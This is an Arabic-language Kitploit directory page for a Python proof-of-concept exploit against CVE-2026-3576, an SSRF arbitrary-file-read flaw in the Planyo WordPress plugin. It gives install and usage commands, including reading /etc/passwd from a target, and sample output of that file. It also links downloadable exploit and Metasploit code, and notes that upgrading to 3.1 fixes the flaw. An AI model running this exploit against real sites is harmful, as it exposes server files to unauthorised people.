Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-3576 — إثبات مفهوم لاستغلال CVE-2026-3576 | Kitploit
أدوات/GitHubGitHub/anirbala98/cve-2026-3576
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubanirbala98/cve-2026-3576

CVE-2026-3576

إثبات مفهوم لاستغلال CVE-2026-3576

عرض المستودع
2113منذ 11 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-3576 - إضافة ووردبريس Planyo Online Reservation System <= 3.0 - قراءة ملفات عشوائية عبر SSRF

يحتوي هذا المستودع على برنامج إثبات مفهوم (PoC) مبني على لغة بايثون لاستغلال ثغرة CVE-2026-3576. يمكن العثور عليه أيضاً في Exploit-DB هنا.

كما قمت بتطوير وحدة Metasploit لهذا الاستغلال ويمكن العثور عليها هنا.

إخلاء مسؤولية

تم توفير هذا المشروع لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها.

نظرة عامة

توجد ثغرة تزوير طلبات من جانب الخادم (SSRF) في إضافة Planyo Online Reservation System في ووردبريس قبل الإصدار 3.1. تسمح هذه الثغرة لمهاجم غير مصادق بتقديم عنوان file:// عبر معامل ulap_url، مما يؤدي إلى الوصول إلى ملفات عشوائية.

يمكن العثور على تقرير مفصل مع تحليل الكود المصدري وعرض توضيحي للاستغلال على مدونتي على Medium.

الإصدارات المتأثرة

المكوّنالإصدار
الإضافة الثغرة<=3.0
الإضافة المُصححة3.1

المتطلبات

  • Python 3.13.14
  • Requests 2.32.5

التثبيت

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

مثال

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable

[*] Attempting to read arbitrary file...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

التخفيف

قم بترقية الإضافة إلى الإصدار 3.1.

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2026-3576
  • https://www.planyo.com/wordpress-reservation-system/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
  • https://www.exploit-db.com/exploits/52636
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-3576-3fa9754bd8d3
تنزيل الأداة